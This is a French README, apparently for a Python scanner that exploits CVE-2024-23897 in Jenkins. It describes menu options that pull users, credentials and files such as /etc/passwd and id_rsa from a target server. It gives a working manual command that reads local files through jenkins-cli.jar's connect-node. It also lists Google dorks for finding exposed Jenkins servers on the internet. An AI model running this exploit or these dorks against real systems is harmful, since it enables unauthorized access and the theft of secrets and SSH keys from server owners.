
Un script réalisé en python pour automatiser la vulnérabilité CVE-2024-23897
Versions affectées :
Un script réalisé en Python pour automatiser la vulnérabilité CVE-2024-23897 🤖 🛠️
Ce code Python présente un scanner pour une vulnérabilité spécifique (CVE-2024-23897) sur les serveurs Jenkins. Il commence par demander à l'utilisateur l'URL du serveur Jenkins.
Ensuite, il offre l'option de télécharger le fichier "jenkins-cli.jar" nécessaire pour interagir avec Jenkins depuis la ligne de commande. Après cela, il affiche un menu d'options qui inclut l'exécution de commandes telles que l'obtention d'informations sur le serveur, l'environnement, la configuration Jenkins, les utilisateurs, les identifiants, ainsi que la lecture de fichiers sensibles comme "/etc/passwd", "/etc/os-release" et "id_rsa".
Une fois qu'une option de menu est sélectionnée, la commande correspondante est exécutée sur le serveur Jenkins fourni. Le code est structuré avec des fonctions pour télécharger le fichier et exécuter les commandes, et une fonction principale pour gérer le flux du programme.
Exécution pour serveur Jenkins 📝 :
python3 CVE-2024-23897-A-scaner.py
exécution pour serveur Jenkins DANS DOCKER 📝 :
python3 CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------
exécution manuelle.
1- télécharger jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar
2- pour effectuer LFI, exécuter : java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"
liste de dorks :
intitle:"Dashboard [Jenkins]" inurl:"/login"
intitle:"Jenkins" "Dashboard"
inurl:"/computer/" intitle:"Jenkins"
inurl:"/script" intitle:"Jenkins"
"Jenkins [Jenkins]" intitle:"Login"
intitle:"Jenkins" "Jenkins ver. 2.441"
inurl:"/manage" intitle:"Jenkins"
site:.com intitle:"Jenkins"
site:aws.amazon.com intitle:"Jenkins"
filetype:xml inurl:"jenkins/config.xml"